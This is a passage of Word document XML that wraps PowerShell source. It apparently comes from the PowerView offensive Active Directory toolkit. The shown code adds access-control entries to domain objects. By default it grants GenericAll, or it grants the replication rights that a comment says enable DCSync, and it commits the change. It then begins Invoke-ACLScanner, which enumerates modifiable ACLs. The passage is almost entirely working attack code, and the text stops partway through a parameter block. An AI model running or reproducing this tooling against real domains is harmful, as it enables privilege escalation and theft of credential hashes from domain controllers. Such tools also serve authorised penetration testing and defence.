    <w:p w14:paraId="30314AEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E13D71C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3040CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            #   when applied to a domain's ACL, allows for the use of DCSync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78324358" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            "DCSync" { "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2", "89e95b76-444d-4c62-991a-0facbeda640c"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4E8F7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE38673" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A9D406" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C37D9C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($GUIDs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A95FFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        foreach($GUID in $GUIDs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD41A17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $NewGUID = New-Object Guid $GUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF9D27F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $ADRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170D52F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity,$ADRights,$ControlType,$NewGUID,$InheritanceType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7533A451" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59339D2D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C21BAF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250E53A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # deault to GenericAll rights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AAD5F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ADRights = [System.DirectoryServices.ActiveDirectoryRights] "GenericAll"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DEA74B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity,$ADRights,$ControlType,$InheritanceType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C49DD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E75642" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2FE51212" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    Write-Verbose "Granting principal $ResolvedPrincipalSID '$Rights' on $($_.Properties.distinguishedname)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F30C31" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64276A7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572D7AE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # add all the new ACEs to the specified object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D0EEED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        ForEach ($ACE in $ACEs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186AA901" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            Write-Verbose "Granting principal $ResolvedPrincipalSID '$($ACE.ObjectType)' rights on $($_.Properties.distinguishedname)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE259F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Object = [adsi]($_.path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA220F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Object.PsBase.ObjectSecurity.AddAccessRule($ACE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D75B1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Object.PsBase.commitchanges()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACED734" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C22A8CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B2A22E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38049328" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        Write-Warning "Error granting principal $ResolvedPrincipalSID '$Rights' on $TargetDN : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228E3435" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4475A474" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7032CFC1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6859023E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Searcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B7EA5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA652C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC1FB67" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Warning "Error: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED65BDC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108EDEAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5400EE22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BC680A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F031BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29B0B491" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B0BEC26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Invoke-ACLScanner {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136F66F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CDE0A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2F6497" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Searches for ACLs for specifable AD objects (default to all domain objects)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4132E878" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        with a domain sid of &gt; -1000, and have modifiable rights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590D27EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="68C16AE3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E84B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="16A66329" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SamAccountName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0836C6FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="387C4FAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Object name to filter for.        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14092DB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F2B69BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F849AED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1D386E6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Object name to filter for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F16760" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0017998F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DistinguishedName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246AA199" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29C6293A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Object distinguished name to filter for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3228517D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4FCB03D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5E8035" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="566940D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A customized ldap filter string to use, e.g. "(description=*admin*)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE8DB1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662A8FB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D7874B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C6E03BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13924C0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7C086D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="275C33E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSprefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1740444B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1788B223" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Prefix to set for the searcher (like "CN=Sites,CN=Configuration")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7226A7BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4FFD818E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B600F82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F3FCFC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to use for the query, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E131888" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0DA0C9F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C70B0D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A3C2295" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30079442" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2DCF718F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ResolveGUIDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A443CAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="76D804B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Resolve GUIDs to their display names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583910AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2041D255" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182EC8AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="55D50E07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69880E70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="239ECE1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E55BF79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5A9F3A61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-ACLScanner -ResolveGUIDs | Export-CSV -NoTypeInformation acls.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298F88A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="02799030" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Enumerate all modifable ACLs in the current domain, resolving GUIDs to display </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9D330B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        names, and export everything to a .csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BBE9EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15099A55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C725B6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A29CEB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EC412E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328D87D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA0D59C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SamAccountName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072FBCB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4D67291F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A15B0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Name = "*",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2E3AC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1E914A85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('DN')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E49793" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A97B247" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DistinguishedName = "*",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389F1965" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A9E1C18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA8ADD8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Filter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18220B3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D15FFD8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0004F5C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5954E9B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2997144F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F2E195" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSprefix,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C4E486" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="177FC8E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4A8F00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735CA101" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4399916F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756D22B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D9CD0C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C9C4E41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3372E80F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ResolveGUIDs,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3D561F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7E1DD8D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A13F044" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
